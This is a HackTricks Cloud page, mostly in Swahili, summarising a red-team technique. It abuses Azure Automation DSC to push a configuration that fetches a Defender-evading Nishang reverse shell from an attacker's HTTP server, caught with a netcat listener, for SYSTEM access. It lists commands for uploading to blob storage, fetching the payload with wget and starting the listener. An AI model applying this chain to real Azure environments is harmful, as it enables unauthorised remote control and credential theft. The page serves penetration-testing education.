Az - State Configuration RCE

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Check the complete post in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Summary of Remote Server (C2) Infrastructure Preparation and Steps

Overview

Mchakato huu unahusisha kuanzisha miundombinu ya seva ya mbali ili kuhifadhi payload iliyobadilishwa ya Nishang Invoke-PowerShellTcp.ps1, inayoitwa RevPS.ps1, iliyoundwa ili kupita Windows Defender. Payload inatolewa kutoka kwa mashine ya Kali Linux yenye IP 40.84.7.74 kwa kutumia seva rahisi ya HTTP ya Python. Operesheni inatekelezwa kupitia hatua kadhaa:

Step 1 — Create Files

Files Required: Inahitajika skripti mbili za PowerShell:

reverse_shell_config.ps1: Faili ya Desired State Configuration (DSC) inayopata na kutekeleza payload. Inapatikana kutoka GitHub.
push_reverse_shell_config.ps1: Skripti ya kuchapisha usanidi kwa VM, inapatikana kwenye GitHub.

Customization: Vigezo na parameta katika faili hizi lazima zibadilishwe ili kufaa mazingira maalum ya mtumiaji, ikiwa ni pamoja na majina ya rasilimali, njia za faili, na vitambulisho vya seva/payload.

Step 2 — Zip Configuration File

Faili reverse_shell_config.ps1 inashirikiwa katika faili la .zip, ikifanya iwe tayari kwa uhamishaji kwenda kwenye Akaunti ya Hifadhi ya Azure.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Step 3 — Weka Muktadha wa Hifadhi & Pakia

Faili la usanidi lililoshonwa linapakiwa kwenye kontena la Hifadhi la Azure lililowekwa awali, azure-pentest, kwa kutumia cmdlet ya Azure Set-AzStorageBlobContent.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Step 4 — Prep Kali Box

Seva ya Kali inashusha mzigo wa RevPS.ps1 kutoka kwenye hifadhi ya GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Skripti inahaririwa ili kubaini VM ya Windows inayolengwa na bandari ya shell ya kurudi.

Hatua ya 5 — Chapisha Faili la Mipangilio

Faili la mipangilio linafanywa kazi, na kusababisha skripti ya shell ya kurudi kupelekwa kwenye eneo lililotajwa kwenye VM ya Windows.

Hatua ya 6 — Kuweka Payload na Kuanzisha Listener

Python SimpleHTTPServer inaanzishwa ili kuhifadhi payload, pamoja na listener ya Netcat ili kukamata muunganisho unaokuja.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Kazi iliyoandaliwa inatekeleza payload, ikipata haki za kiwango cha SYSTEM.

Hitimisho

Utekelezaji wa mafanikio wa mchakato huu unafungua uwezekano mwingi wa hatua zaidi, kama vile kudondosha akidi au kupanua shambulio kwa VMs nyingi. Mwongozo unahimiza kujifunza na ubunifu endelevu katika eneo la Azure Automation DSC.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 1 month ago